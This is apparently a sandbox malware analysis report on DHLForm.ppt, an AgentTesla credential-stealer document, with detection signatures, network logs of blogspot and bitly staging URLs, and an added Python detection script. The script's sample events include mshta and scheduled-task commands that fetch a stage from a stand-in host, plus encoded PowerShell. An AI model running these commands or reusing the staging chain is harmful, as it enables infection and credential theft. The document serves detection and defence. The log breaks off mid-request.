Windows Analysis Report DHLForm.ppt

Overview

General Information

Sample Name: DHLForm.ppt
Analysis ID: 483878
MD5: 5a5ff1cffdb0ea343fd5ab32c6eeb740
SHA1: e372c4f53febe5c4d74a01eb6985e80a31d52e25
SHA256: 9e4134fbb243efdb6d965eec21d98b4ad702e7fca13b5f1af47d30e3b0019585
Tags: Powershell, ppt, PS-3losh-rat, Rat

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for submitted file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Compiles code for process injection (via .Net compiler)
Writes or reads registry keys via WMI
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Enables debug privileges
PE file does not import any functions
Installs a global mouse hook
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: DHLForm.ppt Virustotal: Detection: 22%
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Antivirus or Machine Learning detection for unpacked file
Source: 40.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.35:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49870 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: bitly.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Source: powerpnt.exe Memory has grown: Private usage: 0MB later: 49MB
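The Sigma hits under Signatures and the POWERPNT.EXE to mshta.exe process start above describe one chain: an Office process spawns mshta.exe, mshta.exe spawns a Windows shell, csc.exe compiles from a suspicious source folder, a scheduled task is registered that launches mshta.exe, and RegAsm.exe is started as a sacrificial process with improper arguments before being injected into. The Python below is an added example, not code from the report or from Joe Sandbox, that re-implements those checks in simplified form over constructed Sysmon-style process-creation events and walks the parent chain for each hit. The pids, command lines and file paths are assumptions, and the rule bodies approximate the intent of the named Sigma rules rather than reproducing them.

```python
import ntpath
import re

# Constructed process-creation events shaped like the chain in this report.
# Pids, paths and every command line are assumptions for the example; only the
# image names (POWERPNT.EXE, mshta.exe, powershell.exe, csc.exe, schtasks.exe,
# RegAsm.exe) come from the signatures above.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /s DHLForm.ppt'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r"mshta.exe https://example.invalid/stage1"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -enc QQBBAEEA"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmd": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\abc123\abc123.cmdline"'},
    {"pid": 500, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 60 /tn "Updater" /tr "mshta.exe https://example.invalid/stage1"'},
    {"pid": 600, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"pid": 700, "ppid": 1,   "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"svchost.exe -k netsvcs"},
]

# Simplified allow/deny sets approximating the Sigma rules named in the report.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SACRIFICIAL = {"regasm.exe", "regsvcs.exe", "rundll32.exe", "msbuild.exe"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def arguments(cmd):
    """Everything after the first token, honouring a quoted executable path."""
    m = re.match(r'^(?:"[^"]*"|\S+)\s*(.*)$', cmd)
    return m.group(1) if m else ""


def evaluate(events):
    """Return (rule_name, pid) for every event matching one of the checks."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmd"].lower()
        if pimg in OFFICE and img in SHELLS:           # Office Product Spawning Windows Shell
            hits.append(("office_spawns_shell", e["pid"]))
        if pimg == "mshta.exe" and img in SHELLS:      # Mshta Spawning Windows Shell
            hits.append(("mshta_spawns_shell", e["pid"]))
        if img == "csc.exe" and any(m in cmd for m in TEMP_MARKERS):  # Suspicious Csc.exe Source File Folder
            hits.append(("csc_source_in_temp", e["pid"]))
        if img == "schtasks.exe" and "/create" in cmd and "mshta" in cmd:  # scheduled task launching mshta.exe
            hits.append(("schtask_launches_mshta", e["pid"]))
        if img in SACRIFICIAL and not arguments(e["cmd"]):  # sacrificial process with improper arguments
            hits.append(("sacrificial_process_no_args", e["pid"]))
    return hits


def ancestry(events, pid):
    """Process chain from the root down to pid, as image basenames."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:28} pid={pid}  chain={' > '.join(ancestry(EVENTS, pid))}")
```

The ancestry walk is what turns five independent rule hits into one story: every hit here descends from POWERPNT.EXE, which is the fact an analyst needs in order to treat the scheduled task and the argument-less RegAsm.exe as part of the document's execution rather than as unrelated noise.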

Networking:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: bitly.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: johonathahogyaabagebarhomeintum.blogspot.com

Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: johonathahogyaabagebarhomeintum.blogspot.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: resources.blogblog.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: accounts.google.com

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.blogger.com

Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.google-analytics.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: resources.blogblog.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1
  Accept: */*
  Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: resources.blogblog.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: fonts.gstatic.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236

Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1
  Accept: */*
  Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: fonts.gstatic.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: randikhanaekminar.blogspot.com

Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1
  Accept: */*
  Referer: https://randikhanaekminar.blogspot.com/p/ayoola.html
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1
  Accept: */*
  Referer: https://randikhanaekminar.blogspot.com/p/ayoola.html
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: randikhanaekminar.blogspot.com
  Connection: Keep-Alive

Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1
  Accept: */*
  Referer: https://randikhanaekminar.blogspot.com/p/ayoola.html
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: www.blogger.com
  Connection: Keep-Alive
  Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236

Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1
  Accept: */*
  Referer: https://randikhanaekminar.blogspot.com/p/ayoola.html
  Accept-Language: en-US
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
